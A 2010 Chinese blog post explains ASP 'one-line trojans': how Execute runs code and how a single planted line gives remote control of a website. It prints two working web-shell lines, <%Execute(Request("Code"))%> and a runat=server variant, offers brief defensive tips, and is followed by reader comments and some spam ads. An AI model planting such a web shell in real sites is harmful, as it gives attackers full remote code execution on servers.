谈谈一句话木马
石头 发布于2010-8-9 19:35:58 分类: 编程技术 已浏览448次 网友评论29条 我要评论
顾名思义,一句话木马的意思就是,只用在程序中插入简单的几个字符就可以实现完全控制整个网站的木马程序。初学者往往会觉得非常的不可思议,不过我相信你看过本文以后就应该会清楚的明白一句话的原理了。
在ASP里,函数Execute或(Server.Execute)是一个可以在当前页面中执行子页面的程序的函数,即与include的效果类似。请看下面的例子:
A.asp页
<%
Response.Write("This is in A.asp")
Call Execute("b.asp")
Response.Write("A.asp Response End")
%>
B.asp页
<%
Response.Write("This is in B.asp")
%>
执行A.asp页的结果如下:
This is in A.asp
This is in B.asp
A.asp Response.End
看到效果了吧。通过Execute可以执行任何符合ASP规范的ASP代码和文件。因此骇客要希望一句话木马就非常的容易啦,他们只需要在你的程序程序里插入以下代码就可以完全控制你的网站了!
<%Execute(Request("Code"))%>
当一个页面已经存在这个代码以后,就可以通过远程POST的方式提交任意代码,程序都会完全的执行:比如上传大马。那有人会说,那如果我过滤了%标签是不是就可以了呢?答案是否定的,骇客照样可以构造如下代码:
<script language="vbscript" runat="server">
Execute(Request("Code"))
</script>
这使用runat="server"替换<%%> 也是一个非常好的方式,隐密性比较高。对于一句话木马的防范,除了防止远程数据提交以后,还得对输入的内容进行非常严格的过滤,不过道高一尺魔高一丈,随时备份网站,关键时候恢复才得良策。
原创文章转载请注明引自石头博客 http://www.stou.info/ 欢迎订阅石头博客。
猜你也喜欢
最新评论及回复
文章归档
- 2012 January (1)
- 2011 December (1)
- 2011 November (1)
- 2011 October (2)
- 2011 September (1)
- 2011 August (1)
- 2011 July (3)
- 2011 June (2)
- 2011 May (4)
- 2011 April (4)
- 2011 March (3)
- 2011 February (2)
- 2011 January (1)
- 2010 December (4)
- 2010 November (6)
- 2010 October (6)
- 2010 September (7)
- 2010 August (8)
- 2010 July (7)
- 2010 June (7)
- 2010 May (9)
- 2010 April (19)
- 2010 March (15)
- 2010 February (16)
- 2010 January (24)
- 2009 December (26)
zblog 被挂了一句话木马如何清除呢?
学习了~~~
呵呵,看来站长也研究过黑客啊,我也执迷过一段时间哈,不过想想,这些东西不会为四个现代化做出什么贡献,就放弃了哈。
感谢楼主分享的好文章!!!
高手啊,想学习~呵呵
这个不太懂
很厉害,没看懂
说的有些道理
看了半天没弄明白,到是认识一句话,真不知道原理
最担心被别人上马。
谈马色变啊
石头教我怎么挂马。。哈哈~
原来木马就是这样挂的……
呵呵
来学习了,谢谢博主
木马是这么好挂的东西?
这东西我最怕,不知道还好.
其实一句话还有多个变种.. 石头可以详细研究一下..
看不懂。。
看看就好。
木马应该分很多种,以前稍微了解过~~
但还是不懂~
男士洗面奶www.nsxmn.com性价比最高的男士护理品网站
zippo价格www.zippoku.com淘宝热卖千件的正品打火机
孩子教育www.danqinbama.com关注单亲家庭孩子的教育
以前买过黑客杂志看看,不过代码嘛。。看看就好
我的经常给人挂马。。。是石头教的吧。
几年没研究过这个东西了..
ASP博客存在这样的漏洞吗?会被一句话木马入侵吗?
....
你们都是来蹭沙发的啊 ...
不接触这类事情,所以趁早占楼走人拉!
跟随一楼仁兄步伐!
来了大沙发啊....虽然不懂.友情顶贴